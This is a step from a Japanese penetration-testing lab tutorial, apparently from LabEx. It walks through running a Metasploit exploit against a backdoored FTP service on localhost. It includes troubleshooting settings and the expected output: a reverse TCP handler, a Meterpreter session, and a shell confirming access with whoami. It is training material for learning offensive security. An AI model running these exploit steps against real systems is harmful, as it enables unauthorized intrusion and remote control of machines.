exploit コマンドによるエクスプロイトの実行
エクスプロイトの設定が完了しましたので、ターゲットに対して実行します。exploit コマンド(run と省略可能)を使用すると、現在のモジュールと設定に基づいて攻撃が開始されます。
以下のコマンドを入力して Enter キーを押し、エクスプロイトを実行してください。
exploit
トラブルシューティング: Msf::OptionValidateError One or more options failed to validate: LHOST というエラーが表示された場合は、set LHOST 127.0.0.1 を実行してください。また、All encoders failed to encode と表示された場合は、set Encoder generic/none を実行してエンコーディングを無効化してから、再度 exploit を実行してください。
警告: 初回の試行で "Unable to connect to backdoor on 6200/TCP. Cooldown?" や "Exploit completed, but no session was created." といったエラーが出て失敗する場合があります。その際は、もう一度 exploit コマンドを実行してください。2回目の試行で成功するはずです。
Metasploit がバックドアへの攻撃を試みます。攻撃の各ステップを示す詳細な出力が表示されます。成功するとバックドアが起動し、Meterpreter セッションが開かれます。
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
重要: エクスプロイトが成功すると、Meterpreter プロンプトが表示されます。これがリモートアクセスの成功を意味します!shell を実行して対話型コマンドシェルを取得し、whoami や id を実行してアクセス権を確認してみましょう。
shell
Process 1234 created.
Channel 1 created.
whoami
labex
おめでとうございます!これでリモートアクセスの獲得に成功しました。